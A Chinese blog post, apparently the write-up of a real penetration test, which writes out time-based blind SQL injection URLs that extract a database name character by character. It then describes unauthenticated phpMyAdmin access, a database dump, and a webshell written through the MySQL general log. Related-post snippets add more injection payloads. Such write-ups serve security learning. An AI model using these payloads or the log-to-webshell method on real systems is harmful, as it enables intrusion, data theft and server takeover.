mysql安全性案例分析_技术讨论 | 某真实渗透实践案例分析

最新推荐文章于 2023-04-26 14:08:21 发布
最新推荐文章于 2023-04-26 14:08:21 发布
阅读量320 收藏
点赞数
文章标签: mysql安全性案例分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42154650/article/details/114838390
版权
本文通过一个真实的渗透实践案例,详细分析了如何利用SQL时间盲注技术确定数据库名称,并通过phpmyadmin的不当配置实现免登录访问,进一步探讨了如何利用phpmyadmin的日志功能获取webshell。案例展示了网络安全的重要性,呼吁大家共同维护网络安全。
摘要由CSDN通过智能技术生成

猜测xxx.xxx.22.189ip公网ip每个端口单独映射到内网系统

2.2实战开始

前期搜集的资产信息越广,我们的攻击面就越多,所以后期的成就是建立在前期的信息搜集之上。

2.2.1首先对目标进行测试发现官网存在sql时间盲注

延迟注入,是一种盲注的手法,提交对执行时间敏感的函数sql语句,通过执行时间的长短来判断是否执行成功,比如:正确的话会导致时间很长,错误的话会导致执行时间很短,这就是所谓的高级盲注。

4dbd199a3c00c0018df9e462dd890af9.png

https://xxx.xxx.com/ListInfo/?classid=40&line=A%BF&lineid=if(now()=sysdate()%2Csleep(10)%2C0)&ph=1&station=

5eaf54d5c11ae03bb77789edfa812f5c.png

在这里用出sqlmap直接开跑发现跑不出来失败了,范围太大就精确点手工把数据库名弄出来在跑表

7ed31dd6ff973a8d1f7036220c965c3a.png

首先确认数据库名称长度

需要把判断注入点换成if(length(database())=6%2Csleep(10)%2C0),此语法是判断数据库名称长度是否等于6,如果是沉睡10秒,如果不是不沉睡。

https://xxx.xxx.com/ListInfo/?classid=40&line=A%BF&lineid= if(length(database())=6%2Csleep(10)%2C0)&ph=1&station=

0a9fae8da0520ab96f78acd06d221ea1.png

长度错误如下

45b8839767a6e8048388846d866e30a1.png

得到了数据库名长度、来猜测对应字段、就需要把if(length(database())=6换成if(ascii(substr(database(),1,1))=100,sleep(5),1)这段的意思是if判断数据库名称的第一位开始后推迟一位用ascii表示是否等于100,如果是就沉睡5秒,如果不是就不沉睡

最后判断如下:数据库名称为dt_web

d

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),1,1))=100,sleep(5),1)&ph=1&station=

t

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),2,1))=116,sleep(5),1)&ph=1&station=

_

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),3,1))=95,sleep(5),1)&ph=1&station=1

w

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),4,1))=119,sleep(5),1)&ph=1&station=

e

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),5,1))=101,sleep(5),1)&ph=1&station=

b

https://xxx.xxx.com/ListInfo/?classid=40&line=1&lineid=if(ascii(substr(database(),6,1))=98,sleep(5),1)&ph=1&station=

手工把数据库名称爆出来了,继续用处sqlmap跑表。

+————-+| Parametre || TIL_IDIOTON || store || verkaeufer |+————-+

d76e416906d53ae1743f0851460190fd.png

Sqlmap跑出来四张表、按个对每张表进行字段猜解、跑了一段时间、没出结果。只能手工猜解了、但是猜字段这步骤手工验证需要花费时间非常多、这个sql注入就到这里结束了。

2.2.2接下来又在上图找到的xxx.xxx.22.189:10037网站上发现phpmyadmin网站。该网站问题由于开发者不适当的配置,让我免登录直接进入phpmyadmin内部。

b4440eeb080bbcaeac080557a5087e23.png

既然phpMyAdmin成功进入、那么就可以随意查看数据库信息、篡改信息、增加信息、删除信息、脱库等一些敏感操作。

df967ce8d10b35fcd3a8f41dc68a2758.png

ebe8bdf80241dc387a4753319c4204cc.png

通过上图可以看到、用户密码处、似乎采用了linux用户密码同样加密的手法。

2.2.3知道了phpmyadmin版本信息,借助phpmyadmin日志getshell

1)将general_log打开

1adac36105a197b2f670aa28ab7eaa57.png

71b19c8d54ab008399f183346923bfeb.png

2)将日志文件自定义

问题来了我不知道网站路径是哪个?只知道是D:\MYOA\目录如何自定义路径?

我这边用到的方法是、把数据库脱下来、在一条条匹配信息。

5eeae3234a5a27bca8032c8094160e0e.png

确认网站绝对路径为D:\MYOA\webroot\

已知网站绝对路径、我们可以直接自定义日志文件。

9f3a87391e4f8fd9dc5e1f11514fe424.png

3)使用sql语句写入php一句话木马

f9859b0c91bd93137a55d46b3d16f35f.png

4)webshell工具连接

73b2789dbd2b02c08fa7f70fcd7940c9.png

5)提升权限

d255c9ed2c3c7763cac8ef746a8f24a3.png

2.3测试结果

测试发现了多个漏洞,总结如下:

39396ef4692b320d9cf92ed9cd9c32ab.png

三、总结

最后总结一句:没有网络安全,就没有国家安全!并不仅仅只是一句口号,让我们一起行动起来,为国家网络安全事业做出自己的贡献!

Jmoh
关注
第5篇:MySQL日志分析.pdf
04-22
### MySQL日志分析知识点 #### 一、概览 MySQL作为全球广泛使用的开源关系型数据库管理系统之一,在...此外,通过对日志的进一步处理和自动化监控,可以极大地提高系统的安全性,确保数据的完整性和机密性不受侵犯。
SQL注入 时间延时注入语句
qq_44806973的博客
11-15 2564
id=3 AND (SELECT 5537 FROM (SELECT(SLEEP(15)))PIKH) id=0’XOR(if(now()=sysdate(),sleep(6),0))XOR’Z
api服务器开发语言,web API接口和restful的介绍和使用
weixin_42154650的博客
08-02 1118
web API接口和restful的介绍和使用发布时间:2020-06-23 10:34:57来源:亿速云阅读:269作者:Leah今天就跟大家聊聊有关web API接口和restful的介绍和使用,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。什么是web API接口?明确了请求方式,提供对应后台所需参数,请求url链接可以得到后台的响应数...
【漏洞学习】DVP-2018-04149(SQL盲注+XSS)
Fly_鹏程万里
11-21 566
声明:该系列所揭示的漏洞目前厂家已经全部修复,此处发布相关的内容只为提供学习用途,请勿做其他恶意破坏。 漏洞证明: 一、SQL延时盲注: 官网地址:https://www.btwintrade.com 服务器令我无力吐槽,根本不敢用脚本跑,一跑就死,就做个简单的危害证明了。!!!审核大大在复现的时候,对数据库名称进行爆破的时候一定要使用单线程,千万千万别使用多线程,服务器会被直接跑...
ZZZPHP1.61 代码审计-从SQL注入到Getshell
dfdhxb995397的博客
04-18 468
近期有很多小伙伴在后台留言想看关于代码审计的文章,其实有关审计的文章网上资源是比较多的,但是从代码审计开始到结束的这类文章却少之甚少。 今天要讲解的ZZZPHP1.61这套审计漏洞比较多,SQL注入漏洞、任意文件删除漏洞、任意文件读取漏洞、远程执行漏洞,当中也借助了漏扫工具,内容涵盖全面,分析透彻,学完定会受益匪浅! 注:文章还是原来的方式,先复现后分析,阅读用时约7分...
mysql注入报错函数_MySQL注入常用函数
weixin_42394780的博客
01-30 436
注入的分类仁者见仁,智者见智。基于从服务器接收到的响应▲基于错误的 SQL 注入▲联合查询的类型▲堆查询注射▲SQL 盲注•基于布尔 SQL 盲注•基于时间的 SQL 盲注•基于报错的 SQL 盲注基于如何处理输入的 SQL 查询(数据类型)•基于字符串•数字或整数为基础的基于程度和顺序的注入(哪里发生了影响)★一阶注射 指输入的注射语句对 WEB 直接产生了影响,出现了结果★二阶注射 类似存...
内网渗透思路.pdf
04-22
**案例分析**: 以某系统的Tomcat服务为例(IP地址为192.1.33.133:8080),通过iscan的弱口令检测,发现存在弱口令,直接使用该弱口令成功登录Tomcat控制台。接着,通过上传WAR包的方式获取WebShell权限,进一步读取...
去哪儿网ELK安全监控中心踩坑和实践.pdf
08-23
《去哪儿网ELK安全监控中心的实践与挑战》 去哪儿网的安全工程师周军分享了他在构建和优化ELK(Elasticsearch、Logstash、Kibana)...同时,这个案例也为其他企业在构建自己的安全监控体系时提供了宝贵的实践经验。
QYKCMS构造表单任意文件上传.pdf
最新发布
04-22
对于安全研究人员而言,这些漏洞提供了宝贵的实战案例,有助于提升自身的渗透测试能力和安全意识。 最后,提醒所有用户和开发者重视网络安全,及时更新和修补系统漏洞,保护自己的网络资产免受侵害。
网络安全-Mysql注入知识点
关注网络安全、云原生安全
10-08 5929
目录 注释 SQL语句 查询语句 UNION LIMIT ORDER BY information_schema SCHEMATA TABLES COLUMNS 常用函数 基本函数 盲注(字符串处理函数) 报错注入 时间盲注 本篇文章介绍sql注入时数据库是Mysql时需要掌握的知识点。以Navicat、mysql 5.7.4为例。 注释 #或--空格是单行注释 /**/是内联注释 SQL语句 查询语句 SELECT〈目标列组〉 FROM〈数据源〉 ...
数据库安全性案例分享
2301_76957510的博客
04-26 731
数据库应配置日志功能,记录用户对数据库的操作,包括但不限于以下内容:账号创建、删除和权限修改、口令修改、读取和修改数据库配置、读取和修改业务用户的话费数据、身份数据、涉及通信隐私数据。检查$ORACLE_HOME/network/admin/sqlnet.ora文件中是否设置参数tcp.validnode_checking和tcp.invited_nodes。2. 通过查询dba_role_privs、dba_sys_privs和dba_tab_privs等视图来检查是否使用ROLE来管理对象权限。
SQL语句关于数据库安全性
qq_43058317的博客
11-18 1023
sql语句关于数据库安全性 cc评估保证级(EAL)的划分 评估保证级 定义 TCSEC安全级别(近似相当) EAL1 功能测试 EAL2 结构测试 C1 EAL3 系统地测试和检查 C2 EAL4 系统地涉及,测试和复查 B1 EAL5 半形式化涉及和测试 B2 EAL6 半形式化验证的设计和测试 B3 EAL7 形
与SQL注入可以说的二三事
crystal_shrimps的博客
05-31 1267
写在前面 数据库:mysql 语言:java 代码审计发现,mybatis默认使用预编译#传参,只有少部分语句无法直接使用#传参,会报错,所以开发容易忽视这些地方,直接使用默认的.$传参,这就是我们测试sql注入的重要关注点。 order by like in 注入点(Mysql) Tip: http传参不能带空格,用+代替 比如注释符,mysql的注释符是--空格和#,从前端输入sql语句用--+,实际上经过url解码,传入数据库时变成--空格 普通参数注入 盲注 盲注三种类型 基于时间的 基于布尔的
SQL注入详解
热门推荐
huangyongkang666的博客
03-20 4万+
SQL注入详解 1.SQL注入简介 ​ SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 ​ Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一 2. sql 注入产生原因及威胁 ​ 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行
[记录]使用Springboot+Mybatis-plus 分页查询存在sql注入问题
YisiWzXgd的博客
12-01 786
写Springboot的日常bug
linux nginx 日志位置,mac nginx 日志位置
weixin_42549117的博客
05-02 1244
xsjyBldb • 2021-03-27 07:44''||(select 1 from (select pg_sleep(15))x)||''xsjyBldb • 2021-03-27 07:44'||(select 1 from (select pg_sleep(15))x)||'xsjyBldb • 2021-03-27 07:44'||DBMS_PIPE.RECEIVE_MESSA...
mysql注入之盲注语句汇总
sirius的博客
08-28 4077
目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲注? 基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 盲注就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
mysql 导入超大文件怎么打开_mysql source命令超大文件导入方法总结
weixin_30199299的博客
01-18 593
本文章来给各位朋友介绍利用mysql source命令超大文件导入方法总结,下面收集了两种解决办法,一种是把数据库分文件导出然后再导入,另一种是修改my.ini配置文件,下面我一一给各位朋友介绍。导入1G的数据,但是在怎么都导入不了,用命令行就可以轻松搞定了。用mysql source命令可以导入比较大的文件。代码如下复制代码mysql>use dbtest;mysql>set nam...
mysql 表空间收缩_mysql压缩表空间
weixin_42154650的博客
12-24 299
REPAIR TABLE `table_name` 修复表OPTIMIZE TABLE `table_name` 优化表OPTIMIZE [LOCAL | NO_WRITE_TO_BINLOG] TABLE tbl_name [, tbl_name] ...如果您已经删除了表的一大部分,或者如果您已经对含有可变长度行的表(含有VARCHAR, BLOB或TEXT列的表)进行了很多更改,则应使用OP...
《安全参考》HACKCTO-201309:信息安全技术深度解析
- 小记检测一垃圾小游戏下载站:这可能是关于如何检测和评估小游戏下载站安全性案例研究,可能涵盖了检测恶意代码、流量分析、反向追踪等技术。 - 通过找回密码:找回密码功能经常成为攻击者的入口,这部分可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值